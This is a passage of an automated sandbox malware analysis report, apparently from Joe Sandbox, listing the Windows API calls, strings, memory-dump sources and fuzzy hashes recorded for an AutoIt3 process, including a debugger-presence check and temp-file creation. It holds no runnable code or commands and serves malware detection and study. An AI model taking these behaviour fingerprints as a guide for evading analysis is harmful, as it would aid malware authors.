                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: eb2c209a191b69c3ebcc9d6d126b8bdac186c1c24b40de7a82abadf919b63113
                                      • Instruction ID: 107be94665757b0fee21515f99db9a3d0f60892175898f3117c2866d6cbe335e
                                      • Opcode Fuzzy Hash: eb2c209a191b69c3ebcc9d6d126b8bdac186c1c24b40de7a82abadf919b63113
                                      • Instruction Fuzzy Hash: F5D0127228536836D61532AC7D1AFCA7A48EB15B51F144426BB18E52C349D985D04196
                                      APIs
                                        • Part of subcall function 0083B544: _memset.LIBCMT ref: 0083B551
                                        • Part of subcall function 00820B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0083B520,?,?,?,0080100A), ref: 00820B79
                                      • IsDebuggerPresent.KERNEL32(?,?,?,0080100A), ref: 0083B524
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0080100A), ref: 0083B533
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0083B52E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 3158253471-631824599
                                      • Opcode ID: 9251b878b6358dc24caef4d4375657f635e6fe536f3cf33ddc163e0ae17ffedf
                                      • Instruction ID: eb2c2832fce692c006330677d68094ca8e80abbccd29c89425c4098bf616b78c
                                      • Opcode Fuzzy Hash: 9251b878b6358dc24caef4d4375657f635e6fe536f3cf33ddc163e0ae17ffedf
                                      • Instruction Fuzzy Hash: C5E065B02007118FE320AF79E809B02BAE0FF44315F14891EE596C6741EBB4E548CFA2
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00840091
                                        • Part of subcall function 0087C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0084027A,?), ref: 0087C6E7
                                        • Part of subcall function 0087C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0087C6F9
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00840289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                      • String ID: WIN_XPe
                                      • API String ID: 582185067-3257408948
                                      • Opcode ID: ab6387edc2d44821c46e156f40d424c693a9d9e5f063f37f6633a5825d107f6b
                                      • Instruction ID: a0ba704b1edf7003e1d1a1d2511e6ab0d2f08fbd808cf7cf53906bdc4195235c
                                      • Opcode Fuzzy Hash: ab6387edc2d44821c46e156f40d424c693a9d9e5f063f37f6633a5825d107f6b
                                      • Instruction Fuzzy Hash: 6EF0C97180950DDFCB55DBA4C998BEDBBB8FB48308F240486E246E2190CB719F84DF21
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00869EB5
                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00869ECC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: b539ebd262410884f74415ee4f7d850d5a1d6167c62a15611a3fdfb30f156703
                                      • Instruction ID: f5e9fe5441ecaed6fd4bad70e8089bac4f35a395334faeb74f270186f68e4878
                                      • Opcode Fuzzy Hash: b539ebd262410884f74415ee4f7d850d5a1d6167c62a15611a3fdfb30f156703
                                      • Instruction Fuzzy Hash: 13D05E7654030DAFDB50ABD0DC0EFDBBB2CFB04700F0042A2BE58951A2DAB059988F95
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00885FAB
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00885FBE
                                        • Part of subcall function 008657FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865877
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: ea13ab9e1909e71f8234d5186214d72f32a55fcedc68a65358099b0cc1137c32
                                      • Instruction ID: b16d975352e1d646b4d21a221be352b0a7dc9957a89569df742281a71e0d620a
                                      • Opcode Fuzzy Hash: ea13ab9e1909e71f8234d5186214d72f32a55fcedc68a65358099b0cc1137c32
                                      • Instruction Fuzzy Hash: 84D0C931384311BBE664B7749C5BFD66A14BB50B50F050826B26AEA2D0CAE46800CA54
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00885FEB
                                      • PostMessageW.USER32(00000000), ref: 00885FF2
                                        • Part of subcall function 008657FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865877
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: ad9355aef2dd1660700a63caf4ab1589e9bdac2ed6e244fc39375cda5661d58c
                                      • Instruction ID: 7b81b7c0c432dd66db23dcbc10f20ee2729808a4247f8cf56e9443c3d5ae9219
                                      • Opcode Fuzzy Hash: ad9355aef2dd1660700a63caf4ab1589e9bdac2ed6e244fc39375cda5661d58c
                                      • Instruction Fuzzy Hash: DDD0C931381311BFE664B7749C4BFD66A14BB55B50F050826B266EA2D0CAE46800CA54
                                      APIs
                                      • DestroyIcon.USER32(0002044F), ref: 00814D96
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: DestroyIcon
                                      • String ID: (m$@
                                      • API String ID: 1234817797-4118167608
                                      • Opcode ID: c4c9db8c4627d60f9ef57ce78fb3e1d227de7f32f55502322b85fbbca72ab0db
                                      • Instruction ID: 4b782e1cac267571a6f93927125ae9b41ecfd6f6b10537d6c5b058dc3ac2df5e
                                      • Opcode Fuzzy Hash: c4c9db8c4627d60f9ef57ce78fb3e1d227de7f32f55502322b85fbbca72ab0db
                                      • Instruction Fuzzy Hash: 4BC08CA0748220475F14B7EAE91CEAA653DFF80380300022D7B07C6391DE30D9848FAA